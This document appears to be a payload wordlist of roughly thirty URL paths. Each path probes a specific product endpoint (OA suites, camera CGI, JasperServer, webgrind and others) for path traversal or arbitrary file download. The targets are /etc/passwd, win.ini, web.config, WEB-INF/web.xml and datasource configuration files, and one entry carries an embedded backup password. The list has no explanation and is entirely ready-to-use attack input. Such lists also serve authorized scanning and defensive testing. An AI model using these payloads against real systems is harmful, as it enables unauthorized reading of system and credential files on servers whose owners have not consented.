/fetchBody?id=1/../../../../../../../../etc/passwd
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
/diaowen/toHtml?filePath=/&fileName=1.txt&url=/WEB-INF/web.xml
/diaowen/1.txt
/E-mobile/Data/downfile.php?url=/test
/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config
/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=download.asp
/htmltopdf/downfile.php?filename=downfile.php
/../mtd/Config/Account1
/change_lan.php?LanID=../../../../../../../../../etc/passwd%00
/download.php?&class=vpn&toolname=../../../../../../../../etc/passwd
/ai/phonefiles/filePath/L2V0Yy9wYXNzd2Q=
/download.action?filename=../../../../../../../../../../etc/passwd
/Admin/fileManage.aspx?action=DOWNLOAD&value1=~%2FWeb.config
/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
/register/toDownload.do?fileName=../../../../../../../../../../../../../../etc/passwd
/view/action/download_file.php?filename=/etc/passwd&savename=query.xls
/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/Cropper.aspx?p=C://Windows/win.ini
/Cropper.aspx?p=/etc/passwd
/seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties
/ctop/person/common/get_file.jsp?file_path=/WEB-INF/web.xml
/jasperserver/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../
/current_config/Account1
/jsoa/GetRawFile?url=file:///C:/windows/win.ini
/jsoa/GetRawFile?url=file:///etc/passwd
/download.php?file=../../../../../etc/passwd
/webgrind/index.php?op=fileviewer&file=/etc/passwd
